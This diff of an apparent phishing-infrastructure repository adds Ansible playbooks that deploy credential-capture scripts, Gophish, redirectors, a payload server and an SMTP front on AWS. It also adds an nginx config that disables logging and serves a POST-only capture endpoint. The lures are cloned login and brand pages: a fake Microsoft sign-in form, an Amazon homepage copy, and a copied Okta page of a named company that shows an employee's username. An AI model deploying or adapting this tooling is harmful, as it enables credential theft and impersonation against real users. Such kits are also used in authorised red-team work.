- { src: "../templates/phishing/phishing-landing-page.j2", dest: "/var/www/phishing/index.html" }
- { src: "../templates/phishing/email-templates/office365_login.j2", dest: "/var/www/phishing/templates/o365.html" }
- { src: "../templates/phishing/email-templates/password_expiry.j2", dest: "/var/www/phishing/templates/password.html" }
- { src: "../templates/phishing/email-templates/security_alert.j2", dest: "/var/www/phishing/templates/security.html" }
- { src: "../templates/phishing/email-templates/file_share.j2", dest: "/var/www/phishing/templates/share.html" }
- name: Deploy credential capture script
template:
src: "../templates/phishing/capture.php.j2"
dest: "/var/www/phishing/capture.php"
mode: '0640'
owner: www-data
group: www-data
- name: Configure NGINX for phishing sites
template:
src: "../templates/phishing/nginx-phishing-webserver.j2"
dest: /etc/nginx/sites-available/phishing
mode: '0644'
- name: Enable phishing site
file:
src: /etc/nginx/sites-available/phishing
dest: /etc/nginx/sites-enabled/phishing
state: link
- name: Remove default nginx site
file:
path: /etc/nginx/sites-enabled/default
state: absent
- name: Configure PHP-FPM for security
lineinfile:
path: /etc/php/7.4/fpm/php.ini
regexp: "{{ item.regexp }}"
line: "{{ item.line }}"
loop:
- { regexp: '^expose_php', line: 'expose_php = Off' }
- { regexp: '^display_errors', line: 'display_errors = Off' }
- { regexp: '^log_errors', line: 'log_errors = On' }
- name: Restart services
systemd:
name: "{{ item }}"
state: restarted
enabled: yes
loop:
- nginx
- php7.4-fpm
@@ -0,0 +1,183 @@
---
# Configure security groups and firewall rules for phishing infrastructure
- name: Configure MTA Front security
block:
- name: Create MTA Front security group
amazon.aws.ec2_security_group:
name: "mta-front-{{ deployment_id }}"
description: "Security group for MTA Front server"
vpc_id: "{{ vpc_id }}"
region: "{{ aws_region }}"
rules:
# Management access
- proto: tcp
ports: 22
cidr_ip: "{{ operator_ip }}/32"
rule_desc: "SSH from operator"
# SMTP services - public facing
- proto: tcp
ports: 25
cidr_ip: "0.0.0.0/0"
rule_desc: "SMTP from anywhere"
- proto: tcp
ports: 587
cidr_ip: "0.0.0.0/0"
rule_desc: "SMTP submission"
- proto: tcp
ports: 465
cidr_ip: "0.0.0.0/0"
rule_desc: "SMTPS"
rules_egress:
- proto: -1
cidr_ip: "0.0.0.0/0"
state: present
when: deployment_components.mta_front | default(false) | bool
- name: Configure Gophish security (hidden backend)
block:
- name: Create Gophish security group
amazon.aws.ec2_security_group:
name: "gophish-{{ deployment_id }}"
description: "Security group for Gophish server (hidden)"
vpc_id: "{{ vpc_id }}"
region: "{{ aws_region }}"
rules:
# Management access only
- proto: tcp
ports: 22
cidr_ip: "{{ operator_ip }}/32"
rule_desc: "SSH from operator"
- proto: tcp
ports: 3333
cidr_ip: "{{ operator_ip }}/32"
rule_desc: "Gophish admin interface"
# Internal communication only
- proto: tcp
ports: 80
cidr_ip: "{{ phishing_redirector_ip }}/32"
rule_desc: "HTTP from phishing redirector"
- proto: tcp
ports: 25
cidr_ip: "{{ mta_front_ip }}/32"
rule_desc: "SMTP from MTA front"
rules_egress:
- proto: -1
cidr_ip: "0.0.0.0/0"
state: present
when: deployment_components.gophish | default(false) | bool
- name: Configure Phishing Redirector security (public facing)
block:
- name: Create Phishing Redirector security group
amazon.aws.ec2_security_group:
name: "phish-redirector-{{ deployment_id }}"
description: "Security group for Phishing Redirector"
vpc_id: "{{ vpc_id }}"
region: "{{ aws_region }}"
rules:
# Management access
- proto: tcp
ports: 22
cidr_ip: "{{ operator_ip }}/32"
rule_desc: "SSH from operator"
# Public web access
- proto: tcp
ports: 80
cidr_ip: "0.0.0.0/0"
rule_desc: "HTTP from anywhere"
- proto: tcp
ports: 443
cidr_ip: "0.0.0.0/0"
rule_desc: "HTTPS from anywhere"
rules_egress:
- proto: -1
cidr_ip: "0.0.0.0/0"
state: present
when: deployment_components.phishing_redirector | default(false) | bool
- name: Configure Phishing Web Server security (hidden backend)
block:
- name: Create Phishing Web Server security group
amazon.aws.ec2_security_group:
name: "phish-webserver-{{ deployment_id }}"
description: "Security group for Phishing Web Server (hidden)"
vpc_id: "{{ vpc_id }}"
region: "{{ aws_region }}"
rules:
# Management access only
- proto: tcp
ports: 22
cidr_ip: "{{ operator_ip }}/32"
rule_desc: "SSH from operator"
# Internal communication only
- proto: tcp
ports: 80
cidr_ip: "{{ phishing_redirector_ip }}/32"
rule_desc: "HTTP from phishing redirector"
- proto: tcp
ports: 443
cidr_ip: "{{ phishing_redirector_ip }}/32"
rule_desc: "HTTPS from phishing redirector"
rules_egress:
- proto: -1
cidr_ip: "0.0.0.0/0"
state: present
when: deployment_components.phishing_webserver | default(false) | bool
- name: Configure Payload Server security (hidden backend)
block:
- name: Create Payload Server security group
amazon.aws.ec2_security_group:
name: "payload-server-{{ deployment_id }}"
description: "Security group for Payload Server (hidden)"
vpc_id: "{{ vpc_id }}"
region: "{{ aws_region }}"
rules:
# Management access only
- proto: tcp
ports: 22
cidr_ip: "{{ operator_ip }}/32"
rule_desc: "SSH from operator"
# Internal communication only
- proto: tcp
ports: 80
cidr_ip: "{{ payload_redirector_ip }}/32"
rule_desc: "HTTP from payload redirector"
- proto: tcp
ports: 443
cidr_ip: "{{ payload_redirector_ip }}/32"
rule_desc: "HTTPS from payload redirector"
rules_egress:
- proto: -1
cidr_ip: "0.0.0.0/0"
state: present
when: deployment_components.payload_server | default(false) | bool
- name: Display security configuration summary
debug:
msg:
- "Phishing Infrastructure Security Configuration"
- "============================================="
- "✓ Least privilege access implemented"
- "✓ Backend servers hidden from public access"
- "✓ Only redirectors/MTA fronts are publicly accessible"
- "✓ Operator-only SSH access configured"
- "✓ Internal communication secured"
@@ -0,0 +1,40 @@
server {
listen 80;
server_name _;
root /var/www/phishing;
index index.html index.php;
# Disable all logging
access_log off;
error_log /dev/null crit;
# PHP processing
location ~ \.php$ {
include snippets/fastcgi-php.conf;
fastcgi_pass unix:/var/run/php/php7.4-fpm.sock;
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
}
# Credential capture endpoint
location = /capture.php {
limit_except POST { deny all; }
include snippets/fastcgi-php.conf;
fastcgi_pass unix:/var/run/php/php7.4-fpm.sock;
}
# Template routing
location /templates/ {
try_files $uri $uri/ =404;
}
# Static resources
location /static/ {
try_files $uri $uri/ =404;
}
# Default
location / {
try_files $uri $uri/ /index.html;
}
}
Binary file not shown.

After

Width:  |  Height:  |  Size: 83 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 37 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 43 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 46 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 10 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 25 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 9.0 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 11 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 31 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 34 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 40 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 22 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 38 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 122 KiB

@@ -0,0 +1,238 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Amazon</title>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" integrity="sha512-iecdLmaskl7CVkqkXNQ/ZH/XLlvWZOJyj7Yy7tcenmpD1ypASozpmT/E0iPtmFIB46ZmdtAc9eNBvH0H/ZpiBw==" crossorigin="anonymous" referrerpolicy="no-referrer" />
<link rel="stylesheet" href="style.css">
</head>
<body>
<header>
<div class="navbar">
<div class="nav-logo border">
<div class="logo"></div>
</div>
<div class="nav-address border">
<p class="add-first">Deliver to</p>
<div class="add-icon">
<i class="fa-solid fa-location-dot"></i>
<p class="add-second">US</p>
</div>
</div>
<div class="nav-search">
<select class="search-select">
<option>All</option>
</select>
<input placeholder="Search Amazon" class="search-input">
<div class="search-icon">
<i class="fa-solid fa-magnifying-glass"></i>
</div>
</div>
<div class="nav-signin border">
<p><span>Hello, sign in</span></p>
<p class="nav-second">Accounts & Lists</p>
</div>
<div class="nav-return border">
<p><span>Returns</span></p>
<p class="nav-second">& Orders</p>
</div>
<div class="nav-cart border">
<i class="fa-solid fa-cart-shopping"></i>
Cart
</div>
</div>
<div class="panel">
<div class="panel-all">
<i class="fa-solid fa-bars"></i>
All
</div>
<div class="panel-options">
<p>Today's Deals</p>
<p>Buy Again</p>
<p>Customer Service</p>
<p>Registry</p>
<p>Gift Cards</p>
<p>Sell</p>
</div>
</div>
</header>
<div class="hero-section">
<div class="hero-msg">
<p>You are on amazon.com. You can also shop on Amazon for millions of products with fast local delivery. <a>Click here to go to amazon.in</a></p>
</div>
</div>
<div class="shop-section">
<div class="box">
<div class="box-content">
<h2>Clothes</h2>
<div class="box-img" style="background-image: url('box1_image.jpg');"></div>
<p>Shop now</p>
</div>
</div>
<div class="box">
<div class="box-content">
<h2>Health & Personal Care</h2>
<div class="box-img" style="background-image: url('box2_image.jpg');"></div>
<p>Shop now</p>
</div>
</div>
<div class="box">
<div class="box-content">
<h2>Furniture</h2>
<div class="box-img" style="background-image: url('box3_image.jpg');"></div>
<p>Shop now</p>
</div>
</div>
<div class="box">
<div class="box-content">
<h2>Electronics</h2>
<div class="box-img" style="background-image: url('box4_image.jpg');"></div>
<p>See more</p>
</div>
</div>
<div class="box">
<div class="box-content">
<h2>Beauty picks</h2>
<div class="box-img" style="background-image: url('box5_image.jpg');"></div>
<p>Shop now</p>
</div>
</div>
<div class="box">
<div class="box-content">
<h2>Shop Pet Supplies</h2>
<div class="box-img" style="background-image: url('box6_image.jpg');"></div>
<p>See more</p>
</div>
</div>
<div class="box">
<div class="box-content">
<h2>New Arrival in Toys</h2>
<div class="box-img" style="background-image: url('box7_image.jpg');"></div>
<p>Shop now</p>
</div>
</div>
<div class="box">
<div class="box-content">
<h2>Discover Fashion Trends</h2>
<div class="box-img" style="background-image: url('box8_image.jpg');"></div>
<p>Shop now</p>
</div>
</div>
<div class="box">
<div class="box-content">
<h2>Home refresh ideas</h2>
<div class="box-img" style="background-image: url('box9_image.jpg');"></div>
<p>Shop kitchen upgrades</p>
</div>
</div>
<div class="box">
<div class="box-content">
<h2>Create with strip lights</h2>
<div class="box-img" style="background-image: url('box10_image.jpg');"></div>
<p>Shop now</p>
</div>
</div>
<div class="box">
<div class="box-content">
<h2>For your Fitness Needs</h2>
<div class="box-img" style="background-image: url('box11_image.jpg');"></div>
<p>Shop now</p>
</div>
</div>
<div class="box">
<div class="box-content">
<h2>Spring new arrivals</h2>
<div class="box-img" style="background-image: url('box12_image.jpg');"></div>
<p>Discover more</p>
</div>
</div>
</div>
<footer>
<div class="foot-panel1">
Back to Top
</div>
<div class="foot-panel2">
<ul>
<p>Get to Know Us</p>
<a>Careers</a>
<a>Blog</a>
<a>About Amazon</a>
<a>Investor Relations</a>
<a>Amazon Devices</a>
<a>Amazon Science</a>
</ul>
<ul>
<p>Make Money with Us</p>
<a>Sell products on Amazon</a>
<a>Sell on Amazon Business</a>
<a>Sell apps on Amazon</a>
<a>Become an Affiliate</a>
<a>Advertise Your Products</a>
<a>Self-Publish with Us</a>
<a>Host an Amazon Hub</a>
<a> See More Make Money with Us</a>
</ul>
<ul>
<p>Amazon Payment Products</p>
<a>Amazon Business Card</a>
<a>Shop with Points</a>
<a>Reload Your Balance</a>
<a>Amazon Currency Converter</a>
</ul>
<ul>
<p>Let Us Help You</p>
<a>Amazon and COVID-19</a>
<a>Your Account</a>
<a>Your Orders</a>
<a>Shipping Rates & Policies</a>
<a>Returns & Replacements</a>
<a>Manage Your Content and Devices</a>
<a>Amazon Assistant</a>
<a>Help</a>
</ul>
</div>
<div class="foot-panel3">
<div class="logo"></div>
</div>
<div class="foot-panel4">
<div class="policies">
<a>Conditions of Use</a>
<a>Privacy Policies</a>
<a>Your Ads Privacy Choices</a>
</div>
<div class="copyright">
© 1996-2023, Amazon.com, Inc. or its affiliates
</div>
</div>
</footer>
</body>
</html>
@@ -0,0 +1,269 @@
* {
margin: 0;
font-family: Arial;
border: border-box;
}
.navbar {
height: 60px;
background-color: #0F1111;
color: white;
display: flex;
align-items: center;
justify-content: space-evenly;
}
.nav-logo {
height: 50px;
width: 110px;
}
.logo {
background-image: url("amazon_logo.png");
background-size: cover;
height: 50px;
width: 100%;
}
.border {
border: 1.5px solid transparent;
}
.border:hover {
border: 1.5px solid white;
}
/* box2 */
.add-first {
color: #CCCCCC;
font-size: 0.85rem;
margin-left: 13px;
}
.add-second {
font-size: 1rem;
margin-left: 1.5px;
}
.add-icon {
display: flex;
align-items: center;
}
/* box3 */
.nav-search {
display: flex;
justify-content: space-evenly;
background-color: pink;
width: 600px;
height: 40px;
border-radius: 4px;
}
.search-select {
background-color: #f3f3f3;
width: 50px;
text-align: center;
border-top-left-radius: 4px;
border-bottom-left-radius: 4px;
border: none;
}
.search-input {
width: 100%;
font-size: 1rem;
border: none;
}
.search-icon {
width: 45px;
display: flex;
justify-content: center;
align-items: center;
font-size: 1.2rem;
background-color: #febd68;
border-top-right-radius: 4px;
border-bottom-right-radius: 4px;
color: #0F1111;
}
/* box4 */
span {
font-size: 0.7rem;
}
.nav-second {
font-size: 0.85rem;
font-weight: 700;
}
/* box6 */
.nav-cart i {
font-size: 28px;
}
.nav-cart {
font-size: 0.85rem;
font-weight: 700;
}
/* panel */
.panel {
height: 40px;
background-color: #222f3d;
display: flex;
color: white;
align-items: center;
justify-content: space-evenly;
}
.panel-all:hover {
border: 1.5px solid white;
}
.panel-options p {
display: inline;
margin-left: 10px;
}
.panel-options {
width: 85%;
font-size: 0.85rem;
}
.panel-options p:hover {
border: 1.5px solid white;
}
/* hero section */
.hero-section {
background-image: url("hero1_image.jpg");
background-size: cover;
height: 350px;
display: flex;
justify-content: center;
align-items: flex-end;
}
.hero-msg {
background-color: white;
color: black;
height: 40px;
display: flex;
align-items: center;
justify-content: center;
font-size: 0.85rem;
width: 80%;
margin-bottom: 25px;
}
.hero-msg a {
color: #007185;
}
/* shop-section */
.shop-section {
display: flex;
flex-wrap: wrap;
justify-content: space-evenly;
background-color: hsl(318, 65%, 90%);
}
.box {
/*border: 2px solid black;*/
border-radius: 5px;
height: 400px;
width: 23%;
background-color: white;
padding: 20px 0px 15px;
margin-top: 15px;
}
.box-img {
height: 300px;
background-size: cover;
margin-top: 1rem;
margin-bottom: 1rem;
}
.box-content {
margin-left: 1rem;
margin-right: 1rem;
}
.box-content p {
color: #007185;
}
.box-content p:hover {
color: #febd68;
}
/* footer */
footer {
margin-top: 15px;
}
.foot-panel1 {
background-color: #37475a;
color: white;
height: 50px;
display: flex;
justify-content: center;
align-items: center;
font-size: 0.85rem;
}
.foot-panel2 {
background-color: #222f3d;
color: white;
height: 500px;
display: flex;
justify-content: space-evenly;
}
.foot-panel2 a:hover {
text-decoration: underline;
}
ul {
margin-top: 20px;
}
ul a {
display: block;
font-size: 0.85rem;
margin-top: 10px;
color: #dddddd;
}
.foot-panel3 {
background-color: #222f3d;
color: white;
border-top: 0.5px solid white;
height: 70px;
display: flex;
justify-content: center;
align-items: center;
}
.logo {
background-image: url("amazon_logo.png");
background-size: cover;
height: 50px;
width: 100px;
}
.foot-panel4 {
background-color: #0F1111;
color: white;
height: 80px;
text-align: center;
font-size: 0.7rem;
}
.policies {
padding-top: 25px;
}
.copyright {
padding-top: 5px;
}
@@ -0,0 +1,109 @@
<!DOCTYPE html>
<html>
<head>
<title>Sign in to your account</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>
body {
font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
background-image: url('../illustration');
background-size: cover;
background-position: center;
background-repeat: no-repeat;
margin: 0;
padding: 0;
height: 100vh;
display: flex;
justify-content: center;
align-items: center;
}
.login-container {
background: white;
width: 380px;
padding: 30px 40px;
box-shadow: 0 2px 6px rgba(0,0,0,0.1);
}
.logo {
text-align: left;
margin-bottom: 20px;
}
h1 {
font-size: 24px;
font-weight: 600;
margin: 20px 0 15px;
}
input[type="text"], input[type="password"] {
width: 100%;
padding: 8px 0;
margin-bottom: 15px;
border: none;
border-bottom: 1px solid #ccc;
font-size: 15px;
outline: none;
}
input:focus {
border-bottom: 1px solid #0067b8;
}
.button-container {
text-align: right;
margin-top: 20px;
}
button {
background-color: #0067b8;
color: white;
border: none;
padding: 8px 24px;
font-size: 14px;
cursor: pointer;
}
.links {
margin-top: 20px;
font-size: 13px;
}
.links a {
color: #0067b8;
text-decoration: none;
}
.footer {
position: fixed;
bottom: 0;
width: 100%;
display: flex;
justify-content: space-between;
padding: 10px 20px;
font-size: 12px;
color: #666;
}
.footer a {
color: #666;
text-decoration: none;
margin-left: 20px;
}
</style>
</head>
<body>
<div class="login-container">
<div class="logo">
<img src="https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31" alt="Microsoft" width="108">
</div>
<h1>Sign in</h1>
<form action="process.php" method="post">
<input type="text" name="email" placeholder="Email, phone, or Skype" required>
<input type="password" name="password" placeholder="Password" required>
<div class="links">
<a href="https://signup.live.com/signup">No account? Create one!</a><br>
<a href="https://account.live.com/password/reset">Can't access your account?</a>
</div>
<div class="button-container">
<button type="submit">Next</button>
</div>
</form>
</div>
<div class="footer">
<div class="terms">
<a href="https://www.microsoft.com/en-us/servicesagreement/default.aspx">Terms of use</a>
<a href="https://www.microsoft.com/en-us/privacy/privacystatement">Privacy & cookies</a>
</div>
</div>
</body>
</html>
@@ -0,0 +1,558 @@
<!DOCTYPE html>
<!--[if IE 7]><html lang="en" class="lt-ie10 lt-ie9 lt-ie8"><![endif]-->
<!--[if IE 8]><html lang="en" class="lt-ie10 lt-ie9"> <![endif]-->
<!--[if IE 9]><html lang="en" class="lt-ie10"><![endif]-->
<!--[if gt IE 9]><html lang="en"><![endif]-->
<!--[if !IE]><!--><html lang="en"><!--<![endif]-->
<head>
<meta charset="UTF-8">
<script type="text/javascript" nonce="GbJoEX60HpuEJf6f877zFg">if (typeof module === 'object') {window.module = module; module = undefined;}</script><style type="text/css" nonce="GbJoEX60HpuEJf6f877zFg">
.bgStyle {
background-image: none
}
.bgStyleIE8 {
}
.copyright a:focus-visible,
.privacy-policy a:focus-visible {
border-radius: 6px;
outline: rgb(84, 107, 231) solid 1px;
outline-offset: 2px;
text-decoration: none !important;
}
</style><title>Zimperium - Sign In</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<meta name="robots" content="noindex,nofollow" />
<script type="text/javascript" nonce="GbJoEX60HpuEJf6f877zFg">window.cspNonce = 'GbJoEX60HpuEJf6f877zFg';</script><script src="https://ok14static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.33.2/js/okta-sign-in.min.js" type="text/javascript" integrity="sha384-yEQR8oBedCVhw7cfWyk0wwOq6ewbnlhJsgb3G8QwTyJiYpTkYdfUsWK4QU4wjoen" crossorigin="anonymous"></script>
<link href="https://ok14static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.33.2/css/okta-sign-in.min.css" type="text/css" rel="stylesheet" integrity="sha384-fxx+LDlIb08xQnHiuttLUvFQjDs5lrUHVoq4eWhpVlSteR2K2q21MbrOCkWfWqqs" crossorigin="anonymous"/>
<link rel="shortcut icon" href="https://ok14static.oktacdn.com/bc/image/fileStoreRecord?id=fs0po5khq8H3piuZ0697" type="image/x-icon"/>
<link href="https://ok14static.oktacdn.com/assets/loginpage/css/loginpage-theme.c8c15f6857642c257bcd94823d968bb1.css" rel="stylesheet" type="text/css"/><link href="/api/internal/brand/theme/style-sheet?touch-point=SIGN_IN_PAGE&v=4baaffe7fc3b9ab0621cd0bb108e6974d398a61160fd4993137adea4c8d147355a9a62dc6d9c6a5560ecd7843236810e" rel="stylesheet" type="text/css">
<style type="text/css">
body {
background-color: #ebebed !important;
}
.auth-container {
background-color: #ffffff !important;
}
.o-form-button-bar .button-primary, .o-form-button-bar .button {
background: #1b365d !important;
border-color: #1b365d !important;
}
</style>
<script type="text/javascript" nonce="GbJoEX60HpuEJf6f877zFg">
var okta = {
locale: 'en',
deployEnv: 'PROD'
};
</script><script nonce="GbJoEX60HpuEJf6f877zFg">window.okta || (window.okta = {}); okta.cdnUrlHostname = "//ok14static.oktacdn.com"; okta.cdnPerformCheck = false;</script><script type="text/javascript" nonce="GbJoEX60HpuEJf6f877zFg">
window.onerror = function (msg, _url, _lineNo, _colNo, error) {
if (window.console && window.console.error) {
if (error) {
console.error(error);
} else {
console.error(msg);
}
}
// Return true to suppress "Script Error" alerts in IE
return true;
};
</script><script type="text/javascript" nonce="GbJoEX60HpuEJf6f877zFg">if (window.module) module = window.module;</script></head>
<body class="auth okta-container">
<!--[if gte IE 8]>
<![if lte IE 10]>
<style type="text/css" nonce="GbJoEX60HpuEJf6f877zFg">
.unsupported-browser-banner-wrap {
padding: 20px;
border: 1px solid #ddd;
background-color: #f3fbff;
}
.unsupported-browser-banner-inner {
position: relative;
width: 735px;
margin: 0 auto;
text-align: left;
}
.unsupported-browser-banner-inner .icon {
vertical-align: top;
margin-right: 20px;
display: inline-block;
position: static !important;
}
.unsupported-browser-banner-inner a {
text-decoration: underline;
}
</style><div class="unsupported-browser-banner-wrap">
<div class="unsupported-browser-banner-inner">
<span class="icon icon-16 icon-only warning-16-yellow"></span>You are using an unsupported browser. For the best experience, update to <a href="//help.okta.com/okta_help.htm?type=&locale=en&id=csh-browser-support">a supported browser</a>.</div>
</div>
<![endif]>
<![endif]-->
<!--[if IE 8]> <div id="login-bg-image-ie8" class="login-bg-image tb--background bgStyleIE8" data-se="login-bg-image"></div> <![endif]-->
<!--[if (gt IE 8)|!(IE)]><!--> <div id="login-bg-image" class="login-bg-image tb--background bgStyle" data-se="login-bg-image"></div> <!--<![endif]-->
<!-- hidden form for reposting fromURI for X509 auth -->
<form action="/login/cert" method="post" id="x509_login" name="x509_login" class="hide">
<input type="hidden" id="fromURI" name="fromURI" class="hidden" value="&#x2f;app&#x2f;office365&#x2f;exk1ufbfxuFLJp6y3697&#x2f;sso&#x2f;wsfed&#x2f;passive&#x3f;username&#x3d;Brian.Caldwell&#x25;40Zimperium.com&amp;wa&#x3d;wsignin1.0&amp;wtrealm&#x3d;urn&#x25;3afederation&#x25;3aMicrosoftOnline&amp;wctx&#x3d;"/>
</form>
<div class="content">
<div class="applogin-banner">
<div class="applogin-background"></div>
<div class="applogin-container">
<h1>
<span class="applogin-app-title">
Connecting to</span>
<div class="applogin-app-logo">
<img src="https://ok14static.oktacdn.com/fs/bcg/4/gfs1iitj6mtRHwXoE1d8" alt="Microsoft&#x20;Office&#x20;365" class="logo office365"/></div>
</h1>
<p>Sign in with your account to access Microsoft Office 365</p>
</div>
</div>
<style type="text/css" nonce="GbJoEX60HpuEJf6f877zFg">
.noscript-msg {
background-color: #fff;
border-color: #ddd #ddd #d8d8d8;
box-shadow:0 2px 0 rgba(175, 175, 175, 0.12);
text-align: center;
width: 398px;
min-width: 300px;
margin: 200px auto;
border-radius: 3px;
border-width: 1px;
border-style: solid;
}
.noscript-content {
padding: 42px;
}
.noscript-content h2 {
padding-bottom: 20px;
}
.noscript-content h1 {
padding-bottom: 25px;
}
.noscript-content a {
background: transparent;
box-shadow: none;
display: table-cell;
vertical-align: middle;
width: 314px;
height: 50px;
line-height: 36px;
color: #fff;
background: linear-gradient(#007dc1, #0073b2), #007dc1;
border: 1px solid;
border-color: #004b75;
border-bottom-color: #00456a;
box-shadow: rgba(0, 0, 0, 0.15) 0 1px 0, rgba(255, 255, 255, 0.1) 0 1px 0 0 inset;
-webkit-border-radius: 3px;
border-radius: 3px;
}
.noscript-content a:hover {
background: #007dc1;
cursor: hand;
text-decoration: none;
}
</style><noscript>
<div id="noscript-msg" class="noscript-msg">
<div class="noscript-content">
<h2>Javascript is required</h2>
<h1>Javascript is disabled on your browser.&nbspPlease enable Javascript and refresh this page.</h1>
<a href="." class="tb--button">Refresh</a>
</div>
</div>
</noscript>
<div id="signin-container"></div>
<div id="okta-sign-in" class="auth-container main-container hide">
<div id="unsupported-onedrive" class="unsupported-message hide">
<h2 class="o-form-head">Your OneDrive version is not supported</h2>
<p>Upgrade now by installing the OneDrive for Business Next Generation Sync Client to login to Okta</p>
<a class="button button-primary tb--button" target="_blank" href="https://support.okta.com/help/articles/Knowledge_Article/Upgrading-to-OneDrive-for-Business-Next-Generation-Sync-Client">
Learn how to upgrade</a>
</div>
<div id="unsupported-cookie" class="unsupported-message hide">
<h2 class="o-form-head">Cookies are required</h2>
<p>Cookies are disabled on your browser. Please enable Cookies and refresh this page.</p>
<a class="button button-primary tb--button" target="_blank" href=".">
Refresh</a>
</div>
</div>
</div>
<div class="footer">
<div class="footer-container clearfix">
<p class="copyright">Powered by <a href="https://www.okta.com/?internal_link=wic_login" class="inline-block notranslate">Okta</a></p>
<p class="privacy-policy"><a href="/privacy" target="_blank" class="inline-block margin-l-10">Privacy Policy</a></p>
</div>
</div>
<script nonce="GbJoEX60HpuEJf6f877zFg" type="text/javascript">function runLoginPage (fn) {var mainScript = document.createElement('script');mainScript.src = 'https://ok14static.oktacdn.com/assets/js/mvc/loginpage/initLoginPage.pack.58de3be0c9b511a0fdfd7ea4f69b56fc.js';mainScript.crossOrigin = 'anonymous';mainScript.integrity = 'sha384-cJ4LGViZBmIttMPH+ao2RyPuN5BztKWYWIa4smbm56r1cUhkU/Dr6vTS3UoPbKTI';document.getElementsByTagName('head')[0].appendChild(mainScript);fn && mainScript.addEventListener('load', function () { setTimeout(fn, 1) });}</script><script type="text/javascript" nonce="GbJoEX60HpuEJf6f877zFg">
(function(){
var baseUrl = 'https\x3A\x2F\x2Fzimperium.okta.com';
var suppliedRedirectUri = '';
var repost = false;
var stateToken = '';
var fromUri = '\x2Fapp\x2Foffice365\x2Fexk1ufbfxuFLJp6y3697\x2Fsso\x2Fwsfed\x2Fpassive\x3Fusername\x3DBrian.Caldwell\x2540Zimperium.com\x26wa\x3Dwsignin1.0\x26wtrealm\x3Durn\x253afederation\x253aMicrosoftOnline\x26wctx\x3D';
var username = '';
var rememberMe = true;
var smsRecovery = false;
var callRecovery = false;
var emailRecovery = true;
var usernameLabel = 'Username';
var usernameInlineLabel = '';
var passwordLabel = 'Password';
var passwordInlineLabel = '';
var signinLabel = 'Sign\x20In';
var forgotpasswordLabel = 'Forgot\x20password\x3F';
var unlockaccountLabel = 'Unlock\x20account\x3F';
var helpLabel = 'Help';
var orgSupportPhoneNumber = '';
var hideSignOutForMFA = false;
var hideBackToSignInForReset = false;
var footerHelpTitle = 'Need\x20help\x20signing\x20in\x3F';
var recoveryFlowPlaceholder = 'Email\x20or\x20Username';
var signOutUrl = '';
var authScheme = 'OAUTH2';
var hasPasswordlessPolicy = '';
var INVALID_TOKEN_ERROR_CODE = 'errors.E0000011';
var securityImage = true;
var selfServiceUnlock = false;
selfServiceUnlock = true;
var redirectByFormSubmit = false;
var showPasswordRequirementsAsHtmlList = true;
var autoPush = false;
autoPush = true;
var accountChooserDiscoveryUrl = 'https://login.okta.com/discovery/iframe.html';
// In case of custom app login, the uri is already absolute, so we must not attach baseUrl
var redirectUri;
if (isAbsoluteUri(fromUri)) {
redirectUri = fromUri;
} else {
redirectUri = baseUrl + fromUri;
}
var backToSignInLink = '';
var customButtons;
var pivProperties = {};
var customLinks = [];
var factorPageCustomLink = {};
var linkParams;
var proxyIdxResponse;
var stateTokenAllFlows;
var idpDiscovery;
var idpDiscoveryRequestContext;
var showPasswordToggleOnSignInPage = false;
var showIdentifier = false;
var hasSkipIdpFactorVerificationButton = false;
var hasOAuth2ConsentFeature = false;
var consentFunc;
var hasMfaAttestationFeature = false;
hasMfaAttestationFeature = true;
var rememberMyUsernameOnOIE = false;
var engFastpassMultipleAccounts = true;
var registration = false;
var webauthn = true;
var overrideExistingStateToken = false;
var isPersonalOktaOrg = false;
var sameDeviceOVEnrollmentEnabled = false;
var orgSyncToAccountChooserEnabled = true;
var showSessionRevocation = false;
showSessionRevocation = true;
var hcaptcha;
var loginPageConfig = {
fromUri: fromUri,
repost: repost,
redirectUri: redirectUri,
backToSignInLink: backToSignInLink,
isMobileClientLogin: false,
isMobileSSO: false,
disableiPadCheck: false,
enableiPadLoginReload: false,
linkParams: linkParams,
hasChromeOSFeature: false,
showLinkToAppStore: false,
accountChooserDiscoveryUrl: accountChooserDiscoveryUrl,
mfaAttestation: hasMfaAttestationFeature,
isPersonalOktaOrg: isPersonalOktaOrg,
enrollingFactor: '',
stateTokenExpiresAt: '',
stateTokenRefreshWindowMs: '',
orgSyncToAccountChooserEnabled: orgSyncToAccountChooserEnabled,
inactiveTab: {
enabled: false,
elementId: 'inactive-tab-main-div',
avoidPageRefresh: true
},
signIn: {
el: '#signin-container',
baseUrl: baseUrl,
brandName: 'Okta',
logo: 'https://ok14static.oktacdn.com/fs/bco/1/fs0po5h0orFSteVvh697',
logoText: 'Zimperium logo',
helpSupportNumber: orgSupportPhoneNumber,
stateToken: stateToken,
username: username,
signOutLink: signOutUrl,
consent: consentFunc,
authScheme: authScheme,
relayState: fromUri,
proxyIdxResponse: proxyIdxResponse,
overrideExistingStateToken: overrideExistingStateToken,
interstitialBeforeLoginRedirect: 'DEFAULT',
idpDiscovery: {
requestContext: idpDiscoveryRequestContext
},
features: {
router: true,
securityImage: securityImage,
rememberMe: rememberMe,
autoPush: autoPush,
webauthn: webauthn,
smsRecovery: smsRecovery,
callRecovery: callRecovery,
emailRecovery: emailRecovery,
selfServiceUnlock: selfServiceUnlock,
